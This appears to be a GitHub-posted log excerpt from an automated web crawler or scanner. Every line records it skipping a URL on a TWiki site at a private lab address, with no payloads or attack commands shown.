[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#K'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#L'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#M'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#N'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#O'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#P'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#Q'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#R'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#S'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#T'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#U'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#V'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#W'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#X'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#Y'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14#Z'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?skin=print&rev=1.14'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/TWikiUsers?template=oopsmore&param1=1.16&param2=1.14'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiDocumentation?t=1441458427'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?rev=r1.5'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiRegistration?topicparent=Main.TWikiGuest'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiPreferences?topicparent=Main.TWikiGuest'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGuest?rev1=1.4&rev2=1.3'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?rev=1.3'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGuest?template=oopsmore&param1=1.5&param2=1.5'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?rev=r1.14'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingFAQ?rev1=1.13&rev2=1.12'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?rev=1.12'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingFAQ?template=oopsmore&param1=1.14&param2=1.14'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?skin=print&rev=1.6'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?rev=1.7'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebSearch?template=oopsmore&param1=1.7&param2=1.6'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?skin=print&rev=1.5'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebSearch?template=oopsmore&param1=1.7&param2=1.5'
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiForms?t=1441458430'
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/edit/TWiki/TWikiSite?t=1441458430'
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Site[^A-Za-z]'
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/TWiki/TWikiSite?skin=print'
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/rdiff/TWiki/TWikiSite?rev1=1.22&rev2=1.21'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment